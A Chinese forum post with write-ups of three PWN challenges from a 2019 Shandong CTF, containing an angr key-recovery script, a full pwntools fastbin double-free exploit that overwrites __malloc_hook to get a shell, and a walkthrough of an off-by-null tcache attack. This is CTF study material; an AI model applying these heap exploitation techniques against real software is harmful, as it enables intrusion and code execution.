首页
论坛
课程
招聘
[原创]2019深思杯PWN题解
2020-10-19 14:55 1603

[原创]2019深思杯PWN题解

2020-10-19 14:55
1603

这是19年的山东省网络安全技能大赛的 PWN 题,当时放弃拯救的我,把所有能保存的题目都保存了下来,最近复现一下


PWN1-MinZhu

首先有一个检测,要把 key 找出来才能进入,使用 angr 就可以

import angr
p = angr.Project("./pwn")
state = p.factory.entry_state()
sm = p.factory.simulation_manager(state)
res = sm.explore(find=0x08048817,avoid=0x0804882B)
print(res.found[0].posix.dumps(0))

image.png

找出来 key 是 xNd9y6

然后看一下位置,第四个

image.png

然后, 程序有一个后门,覆盖后面要执行的一个函数的地址为它就能打印出 flag 了

image.png

import angr
p = angr.Project("./pwn")
state = p.factory.entry_state()
sm = p.factory.simulation_manager(state)
res = sm.explore(find=0x08048817,avoid=0x0804882B)
print(res.found[0].posix.dumps(0))


PWN2-heap_doublefree_x64

完整 EXP:

from pwn import *
context(log_level="DEBUG")
p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

def add(size,content):
  p.sendlineafter("choice:","1")
  p.sendlineafter("length of data:\n",str(size))
  p.recvuntil("Leave your message:\n")
  p.send(content)
  
def delete(index):
  p.sendlineafter("choice:","2")
  p.sendlineafter("want to delete:\n",str(index))
  
def show():
  p.sendlineafter("choice:","3")
  
def modify(index,content):
  p.sendlineafter("choice:","4")
  p.sendlineafter("want to modify:\n",str(index))
  p.sendlineafter("to modify:\n",content)

def quit(suggest):
  p.sendlineafter("choice:","5")
  p.sendlineafter("your advice:\n",suggest)

add(0x20,"1111")#1
add(0x20, p64(0) + p64(0x31) + p64(0) + p64(0x31))#2
add(0x20, p64(0) + p64(0x31))#3
add(0x60, "4444")#4
add(0x60, "5555")#5
add(0x20, "2333")#6
delete(1)
delete(2)
delete(1)
add(0x20, "\x50")#7
add(0x20, "\x50")#8
add(0x20, "\x50")#9
add(0x20, p64(0) + p64(0x111))#10
delete(3)
add(0x30, "\x20")#11
show()
p.recvuntil("Total:11,Index->11\nSticky note:")
unsortedbin = u64(p.recv(6).ljust(8, '\x00'))
libc_base = unsortedbin -0x100 - 0x3c4b20
malloc_hook = libc_base + libc.sym['__malloc_hook']
one_gadget = libc_base + 0xf1207
malloc_addr = malloc_hook - 0x30 + 0xd

add(0x60,"1212")#12
add(0x60,"1313")#13
add(0x60,"1414")#14
delete(12)
delete(13)
delete(12)
add(0x60, p64(malloc_addr))
add(0x60, p64(malloc_addr))
add(0x60, p64(malloc_addr))
payload = "a" * 3 + p64(0) + p64(0) + p64(one_gadget)
add(0x60, payload)
p.recvuntil("Your choice:")
p.sendline("1")
p.recvuntil("Input the length of data:\n")
p.sendline("21")
p.interactive()

free 的时候只是把存放的堆指针的地方给置为 0 了,没有把 chunk 给置为 0

fastbin double free 的时候是这么一个指针

image.png

image.png

可以把 fd 指针的最后一位改成 \x50,这样再去 malloc 的时候就能申请到 0x603050

add(0x20,"1111")
add(0x20, p64(0) + p64(0x31) + p64(0) + p64(0x31))#要注意0x603050那里的size
add(0x20, "3333")
add(0x60, "4444")#这俩0x60是为了确保有后面0x110大小的空间
add(0x60, "5555")#0x70+0x70+0x30=0x110
add(0x20, "2333")#这个是防止0x110与top chunk合并的
delete(1)
delete(2)
delete(1)
add(0x20, "\x50")
add(0x20, "\x50")
add(0x20, "\x50")
add(0x20, p64(0) + p64(0x111))

然后 free 掉,再 malloc 回来去 show 就能显示出来,然而我们会改掉后面那一位,不过不要紧,后三位基本都是 0x00 的

delete(3)
add(0x30, "\x20")#11
show()
p.recvuntil("Total:11,Index->11\nSticky note:")
unsortedbin = u64(p.recv(6).ljust(8, '\x00'))
libc_base = unsortedbin -0x100 - 0x3c4b20#这个使用main_arena算出来的

然后就能计算出 malloc_hook 与 one_gadget 的地址了

malloc_hook = libc_base + libc.sym['__malloc_hook']
one_gadget = libc_base + 0xf1207
malloc_addr = malloc_hook - 0x30 + 0xd

在我电脑上 one_gadget 中的 0xf1207 可以用

这个 malloc_addr 是算了个偏移,为了后面申请到 malloc_hook 的时候能有个 size 位绕过检查

然后还是上面的套路,fastbin double free 把 malloc_hook 的地址改为 one_gadget

add(0x60,"1212")#12
add(0x60,"1313")#13
add(0x60,"1414")#14
delete(12)
delete(13)
delete(12)
add(0x60, p64(malloc_addr))
add(0x60, p64(malloc_addr))
add(0x60, p64(malloc_addr))
payload = "a" * 3 + p64(0) + p64(0) + p64(one_gadget)
add(0x60, payload)

然后去申请的时候就能拿到 shell 了

image.png

PWN3-secnote

这个题目配了个 libc 2.27 的,所以应该是在 ubuntu 18 下的

限制了 size 的大小要小于等于 0x78,存在 off by null

image.png

首先把 tcache 填满,接下来 free 的那些就会放到 fastbin 中了

如果 scanf 读入的是一个很大的数的话他就会去申请一块空间,如果这个空间申请的足够大就能触发 malloc_consolidate,从而合并 fastbin 放到 unsorted bin 中去

所以,我们在 scanf 的时候去发送很大的一个数比如 '1'*600 就能让前面那些 fastbin 合并

image.png

再把之前放在 tcache 中的申请回来,然后去申请一个 chunk,正常情况应该是:把 unsorted bin 中那块 0x300 分成 0x80 与 0x280,但是如果全部写上加上后面那个 off by null 就会把 0x280 的 size 给改掉,改为 0x200

image.png

然后把那 0x200 申请掉,再申请的话就从 top chunk 中划分了(/bin/sh 那个),但是此时图中 aaaa16 那里的 prev_size 依然是 0x280

image.png

这时候先把 tcache 填满了,再去 free 掉 aaaa16 那个,然后再次触发 malloc_consolidate 就会再给我们一个 0x300 大小的 free chunk(aaaa16 跟它前面那块)

image.png

先把 tcache 中的都申请完,然后再去申请一个,现在再去 check index27 的就能泄露出 unsorted bin 的地址

image.png

然后申请一个 index10,这时候正好申请到 index27 那里,那么接下来就是 fastbin double free 了,可以对着这个释放两次,一次 free(index27),一次 free(index10),然后把 free_hook 改为 system 的地址,然后去 free(index30) 也就是前面写入 /bin/sh 的那一个 chunk

image.png


参考:https://wzt.ac.cn/2019/11/04/sdnisc2019/


[培训]12月3日2020京麒网络安全大会《物联网安全攻防实战》训练营,正在火热报名中!地点:北京 · 新云南皇冠假日酒店

上传的附件:
收藏
点赞2
打赏
分享
最新回复 (1)
雪    币: 20
活跃值: 活跃值 (17)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
killeroppo 活跃值 2020-10-26 10:37
2
0
6
游客
登录 | 注册 方可回帖
返回